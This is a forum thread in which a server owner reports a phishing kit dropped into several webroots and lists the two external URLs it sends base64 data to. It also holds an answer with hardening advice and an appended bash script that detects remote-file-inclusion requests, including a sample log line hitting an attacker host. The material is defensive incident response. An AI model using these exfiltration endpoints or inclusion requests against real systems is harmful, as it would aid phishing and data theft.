
Possible Duplicate:
My server’s been hacked EMERGENCY

Earlier today I found a lot of weird files on one of my servers (running Ubuntu Server 10.04), and I can't understand how they got there. Probably some sort of XSS injection; I need to dig further into my applications.

What I found: multiple directories in the web roots of several domains, with short names ("wesz", "aog0", "uioolz", ...) containing exactly the same files and file structure. Google doesn't tell me anything about these files or directories, so I am putting them here. It looks like a landing page for some MITM against Microsoft Live and its users.

File structure:

- uioolz (or similar short named directory)
    dataz.php
    index.php
    go.php
    smart.php
    - fll
        <HTML, CSS & JS files for MITM>

Does anyone recognize them and/or can tell me how they could appear in my webroots?

I've run multiple tools to check for rootkits, dug through logs, bash histories, etc., but I can't find anything that indicates that the attackers had a shell (or they are really good at hiding it). The directories and files I found also had the apache user as owner and group, which may indicate that they were uploaded through an injection attack. However, the fact that I found exactly the same files and directories in multiple web roots, for domains that have nothing in common, still bugs me. This may indicate that they actually got a shell... But not all of the domains on the server were attacked, only a small subset.

How can I proceed? At the moment I have no chance of doing a clean install, but it will be done.

Are there any useful tools that can check for XSS or other types of injection vulnerabilities?

I can also add that the intruders' files seem to send information to two external domains (specifically to a gta.php):

http://colorpop.com/wp-content/plugins/mailchimp/gta.php?info=<BASE64-INFO>
http://oderena.lt/gta.php?info=<BASE64-INFO>

Domains registered via a proxy registrar.

anon

1 Answer

  • make sure that your Apache directory (the document tree of the web server) is not writable
  • check your Apache logs for suspicious GET/POST requests (you can grep for those names)
  • check your FTP logs for suspicious requests (you can grep for those names)
  • make sure that your software is up to date
  • if you use any third-party software, contact their support
  • you might check out these tools: Top 125 Network Security Tools
FINESEC
  • Thanks for the reply, but I've checked the Apache logs and can't find any intrusions, or attempts, that way. No FTP server. Software is up to date (updated once a week). No third-party software (only from the repo). Some Apache directories need to be writable for some of the apps. Thanks for the list, will check it out. – anon Nov 09 '12 at 13:45
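The log and writability checks from the answer above, as an added example that is not from the original question or the answer: a small bash triage script that greps an Apache access log for the directory and file names the question lists (and for query strings carrying a remote URL, the usual shape of a remote file inclusion request), reports the first hit per client IP so the initial upload stands out, and lists everything under a webroot that the Apache user can write to. The sample log lines are constructed for the example; the webroot /var/www, the user www-data and the log path are assumptions for an Ubuntu 10.04 host.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post. Constructed sample data below.

# Directory and file names taken from the question; gta.php is the exfil endpoint.
SUSPECT_NAMES='wesz|aog0|uioolz'
SUSPECT_FILES='dataz\.php|go\.php|smart\.php|gta\.php'

# A request line is suspicious if it touches one of the dropped directories or
# files, or if a query parameter carries a full URL (remote file inclusion shape).
LOG_PATTERN="\"(GET|POST) [^\"]*(/($SUSPECT_NAMES)/|/($SUSPECT_FILES)|[?&][^ ]*=https?://)"

# Constructed Apache combined-log sample (IPs from RFC 5737 documentation ranges).
SAMPLE_LOG='203.0.113.7 - - [08/Nov/2012:03:12:41 +0100] "GET /index.php?page=http://oderena.lt/gta.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Nov/2012:03:13:02 +0100] "POST /uioolz/dataz.php HTTP/1.1" 200 21 "-" "Mozilla/5.0"
192.0.2.33 - - [08/Nov/2012:09:41:10 +0100] "GET /blog/2012/11/hello HTTP/1.1" 200 8912 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Nov/2012:03:14:55 +0100] "GET /wesz/go.php?id=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

# 1. Print every request that matches LOG_PATTERN. Reads the files given as
#    arguments, or stdin when none are given (so it works on zcat output too).
suspicious_requests() {
    grep -E "$LOG_PATTERN" "$@"
}

# 2. Earliest suspicious request per client IP, in log order. The first contact
#    from an IP is usually the upload or inclusion that dropped the kit.
first_seen_per_ip() {
    suspicious_requests "$@" | awk '{ if (!($1 in seen)) { seen[$1] = 1; print $1, $4 } }'
}

# 3. Everything under a webroot that the web server user can write to: owned by
#    that user with u+w, group-owned with g+w, or world-writable. Run as root.
#    Defaults (/var/www, www-data) are assumptions for Ubuntu 10.04.
writable_by_apache() {
    local root="${1:-/var/www}" user="${2:-www-data}"
    find "$root" \( \( -user "$user" -perm -u=w \) \
                  -o \( -group "$user" -perm -g=w \) \
                  -o -perm -o=w \) -print 2>/dev/null
}

# Demo on the constructed sample. On the real server, run e.g.
#   suspicious_requests /var/log/apache2/*access.log*
#   zcat /var/log/apache2/*access.log.*.gz | first_seen_per_ip
#   writable_by_apache /var/www www-data
printf '%s\n' "$SAMPLE_LOG" | first_seen_per_ip
```

Grep the rotated logs too (the dropped directories may predate the current access.log), and compare the timestamps of the first hit per IP against the mtime of the dropped directories; a match between an RFI-shaped request and the directory creation time is the kind of evidence the answer is asking for. Anything writable by www-data that an application does not need should be made read-only, and for the directories that must stay writable, serve them with PHP execution disabled.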